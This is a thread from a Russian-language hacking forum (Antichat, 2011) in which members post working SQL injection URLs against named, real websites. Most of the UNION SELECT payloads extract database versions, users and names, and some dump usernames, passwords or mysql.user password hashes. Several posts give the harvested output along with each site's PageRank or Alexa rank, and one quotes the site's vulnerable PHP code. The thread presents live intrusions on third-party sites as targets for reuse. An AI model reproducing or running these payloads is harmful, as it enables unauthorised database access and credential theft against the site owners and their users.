HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14301  
Старый 05.10.2011, 15:09
AHTNkiller
Новичок
Регистрация: 07.09.2011
Сообщений: 20
Провел на форуме:
5323

Репутация: 0
По умолчанию

http://www.autodostavka.ru/index.php?id=729&model=-981%20UNION%20ALL%20SELECT%201,2,3,4,5,6,group_con cat%28username,password%29,8,9,10,11,12%20from%20r egusers
 
Ответить с цитированием

  #14302  
Старый 06.10.2011, 22:35
tght
Участник форума
Регистрация: 24.06.2010
Сообщений: 134
Провел на форуме:
45597

Репутация: 0
По умолчанию

http://shownewstv.ru/taunew/index.php?id=5227-999.9+union+select+1,2,3,4,version(),6,7,8,user(), 10,database(),12,13,14,15,16,17--

5.1.49-1ubuntu8.1

shownews@localhost

DB: wwwshownewstvru

http://avtozapchasty.ru/shop/i.php?id=288821-999.9+union+select+1,2,version(),4,5,6,user(),8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

5.5.16-log 6

cck135@WIN-BZW07G9C3OB
 
Ответить с цитированием

  #14303  
Старый 07.10.2011, 08:41
Faaax
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
Провел на форуме:
124363

Репутация: 11
По умолчанию

Код:
http://faq.freecity.de/support/faq_showfaq.phtml?id=-85+union+select+1,version()+--+&katname=K%C3%BCndigung
4.0.24_Debian-10sarge2-log

pr4

alexa 384,252
 
Ответить с цитированием

  #14304  
Старый 07.10.2011, 08:54
Faaax
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
Провел на форуме:
124363

Репутация: 11
По умолчанию

Код:
http://www.salue.de/nachrichten/message.phtml?id=-14895+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12,13,14,15,16,17,18,19,20,21+--+
pr 5

alexa 272,965
 
Ответить с цитированием

  #14305  
Старый 07.10.2011, 10:53
Boolean
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
Провел на форуме:
40748

Репутация: 78
По умолчанию

Код:
http://roston.cz/czechdjs/?section=karta&id=1+and+1=2+union+select+1,2,3,4,5,6,user(),0x61,9,10,11,12,13,14,version(),database(),17,18,19+--+
так же идет opendir('foto/' . $_GET['id']), и инклудится файл inc-kalendar-10-2011.txt.
 
Ответить с цитированием

  #14306  
Старый 07.10.2011, 21:23
kravch_v
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
Провел на форуме:
45485

Репутация: 1
По умолчанию

ГАЗклуб:

Код:
http://www.gazclub.ru/faq/?mess_id=-1+union+select+null,mysql.user.password,null,null+from+mysql.user
u9884_2'@'10.8.1.198

PageRank - 0

Yandex тИЦ - 120
 
Ответить с цитированием

  #14307  
Старый 08.10.2011, 19:53
0x1d
Новичок
Регистрация: 04.10.2011
Сообщений: 13
Провел на форуме:
2356

Репутация: 0
По умолчанию

http://www.danielbank.kiev.ua/index.php?action=news&type=det&id=79{SQLINJ}

MySQL 5.2.2.

DataBase: danielbank
 
Ответить с цитированием

  #14308  
Старый 10.10.2011, 18:28
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Old School CMS 2010

root@vsevbanu.ru:5.0.51a-24+lenny4-log:vvb

Цитата:
Сообщение от None  
http://www.vsevbanu.ru/post.php?id=-82+UnIon+selECt+1,concat_ws(0x3a,user(),version(), database()),(select(@x)from(select(@x:=0x00),(sele ct(0)from(information_schema.columns)where(table_s chema!=0x696e666f726d6174696f6e5f736368656d61)and( 0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e ,table_name,0x3a,column_name))))x),4,5,6,7,8,9,10+--+
Уязвимость пресутствует из-за отсутствия фильтрации данных в парамитре ID

post.php

Цитата:
Сообщение от None  
if(!empty($_GET['id'])){$id =
$_GET['id']
;}
else $id = 1;
$show = $_GET['show'];
// вывод содержимого страницы;
$sql = "SELECT * FROM `pora` WHERE id =
$id
AND type = 'art'";
$result = mysql_query($sql);
$cont = mysql_fetch_object($result);
 
Ответить с цитированием

  #14309  
Старый 10.10.2011, 18:41
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

http://www.showbilet.ru/index.php?nav=1&page=3&id=-10%20and%201=2%20union%20select%201,concat_ws(char (58),@@version,user(),database(),@@version_compile _os),3,4,5,6,7,8,9,10--

4.0.27-log showbile@v27.valuehost.ru showbile portbld-freebsd7.1
 
Ответить с цитированием

  #14310  
Старый 10.10.2011, 21:49
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906

Репутация: -14
По умолчанию

тиЦ 20 PR 2

Цитата:
Сообщение от None  
http://weldteam.ru/pages.php?id=999999/*++*/union/*++*/select/*++*/concat_ws%280x3a,user%28%29,version%28%29,database %28%29%29,2,3+--+
dexx@localhost:5.0.51a-24+lenny5:dex
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.